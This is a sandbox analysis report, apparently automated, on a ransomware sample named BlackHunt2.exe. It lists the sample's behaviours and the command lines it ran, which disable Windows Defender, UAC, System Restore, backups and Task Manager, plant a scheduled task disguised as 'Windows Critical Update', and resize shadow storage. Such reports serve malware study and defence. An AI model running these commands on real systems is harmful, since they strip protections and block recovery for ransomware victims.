Analysis Overview
SHA256
ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9
Threat Level: Known bad
The file BlackHunt2.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes NTFS Change Journal
UAC bypass
Renames multiple (3360) files with added filename extension
Renames multiple (2894) files with added filename extension
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Disables use of System Restore points
Deletes backup catalog
Disables Task Manager via registry modification
Checks computer location settings
Deletes itself
Adds Run key to start application
Looks up external IP address via web service
Enumerates connected drives
Checks whether UAC is enabled
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Enumerates physical storage devices
Unsigned PE
Runs ping.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Kills process with taskkill
Checks SCSI registry key(s)
Interacts with shadow copies
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious behavior: CmdExeWriteProcessMemorySpam
System policy modification
Modifies registry class
Uses Volume Shadow Copy service COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-06 00:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 00:48
Reported
2024-11-06 00:50
Platform
win7-20240903-en
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Deletes NTFS Change Journal
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Clears Windows event logs
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (2894) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Deletes itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | C:\Windows\system32\reg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ku_IQ\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Dili | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Dublin | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\ext\jaccess.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Caracas | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\content-types.properties | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe
"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
